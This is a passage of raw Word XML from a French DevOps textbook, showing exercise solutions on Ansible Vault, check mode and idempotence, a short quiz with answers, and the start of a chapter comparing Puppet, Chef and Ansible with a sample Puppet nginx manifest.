        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Au second passage, aucune tâche ne doit être </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>changed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : c'est la preuve de l'idempotence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 76.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ansible-vault create group_vars/prod/vault.yml</w:t>
        <w:br/>
        <w:t># db_password: "motdepasse"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Utilisation</w:t>
        <w:br/>
        <w:t># - name: Créer la base</w:t>
        <w:br/>
        <w:t>#   community.postgresql.postgresql_user:</w:t>
        <w:br/>
        <w:t>#     name: app</w:t>
        <w:br/>
        <w:t>#     password: "{{ db_password }}"</w:t>
        <w:br/>
        <w:br/>
        <w:t>ansible-playbook playbook.yml --vault-password-file ~/.vault_pass --check --diff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le fichier chiffré est versionné sans risque ; la clé reste hors du dépôt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> montre la tâche sans appliquer la modification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 76.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>- name: Initialiser l'application</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ansible.builtin.command:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cmd: /opt/app/bin/init --force</w:t>
        <w:br/>
        <w:t xml:space="preserve">    creates: /opt/app/.initialise</w:t>
        <w:br/>
        <w:br/>
        <w:t>- name: Lire la version</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ansible.builtin.command: /opt/app/bin/serveur --version</w:t>
        <w:br/>
        <w:t xml:space="preserve">  register: version</w:t>
        <w:br/>
        <w:t xml:space="preserve">  changed_when: false</w:t>
        <w:br/>
        <w:br/>
        <w:t>- name: Afficher la version</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ansible.builtin.debug:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    msg: "Version installée : {{ version.stdout }}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>creates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche l'exécution si le fichier existe déjà.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>changed_when: false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> corrige le compte rendu sans empêcher l'exécution.</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Pourquoi Ansible ne nécessite-t-il pas d'agent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Il utilise SSH</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Il utilise un démon</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Il utilise le cloud</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Il utilise Docker</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 signifie l'idempotence pour une tâche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Elle s'exécute vite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Elle ne change rien si l'état est déjà correct</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Elle est facultative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Elle s'exécute toujours</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Quel niveau de variable est le plus fort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defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> du rôle</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group_vars</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host_vars</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-e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> en ligne de commande</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 fait Ansible Vault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Chiffre les fichiers de secrets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Gère les utilisateurs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Configure le pare-feu</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Installe des paquets</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Quel mode simule une exécution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--diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul</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--check</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--limit</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-vvv</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A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La connexion se fait par SSH et Python sur la cible.</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Le second passage doit rapporter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et non </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>changed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les variables passées en ligne de commande ont la priorité maximale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Il chiffre des fichiers ou des valeurs avec une clé externe.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annonce les changements sans les appliquer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>77. Gestion de configuration : Chef, Puppet et stratégies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Comparer les approches, choisir selon le contexte et éviter les migrations inutiles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Avancé · Prérequis : chapitre 76</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Situer Chef, Puppet, Salt et Ansible.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Comprendre les modèles push et pull.</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Écrire une ressource Puppet et une recette Chef.</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Évaluer la dette d'une migration.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Choisir une stratégie de gestion de configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>77.1 Deux modèles d'exécution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ansible pousse la configuration depuis un poste de contrôle. Puppet et Chef font l'inverse : un agent sur la machine tire sa configuration d'un serveur et l'applique périodiquement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="89" name="Picture 89"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f87.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId125"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.87 — Deux modèles d'application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.289 — Cinq différences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49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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Pull</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sans agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Agent à déployer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Convergence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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À la demande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Périodique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limitée par le lanceur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bonne sur grands parcs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Dérive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Possible entre deux exécutions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Corrigée automatiquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débogage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par journaux d'agent</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CONVERGENCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Propriété d'un système qui ramène en continu la machine à l'état décrit, même si quelqu'un l'a modifiée manuellement. Le pull converge sans intervention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>77.2 Puppet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Puppet décrit des ressources dans un langage déclaratif. Chaque ressource exprime un état, et le catalogue est compilé sur le serveur avant d'être appliqué par l'agent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un nœud décrit · puppet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site.pp</w:t>
        <w:br/>
        <w:t>node 'web1.exemple.fr' {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  class { 'nginx':</w:t>
        <w:br/>
        <w:t xml:space="preserve">    manage_repo =&gt; true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  nginx::resource::server { 'exemple.fr':</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen_port =&gt; 443,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl         =&gt; true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_cert    =&gt; '/etc/letsencrypt/live/exemple.fr/fullchain.pem',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_key     =&gt; '/etc/letsencrypt/live/exemple.fr/privkey.pem',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    proxy       =&gt; 'http://127.0.0.1:3000',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  package { 'chrony':</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ensure =&gt; installed,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  service { 'chrony':</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ensure  =&gt; running,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    enable  =&gt; true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    require =&gt; Package['chrony'],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.290 — Cinq concepts comparés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225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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Puppet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Chef</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Ansible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unité de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
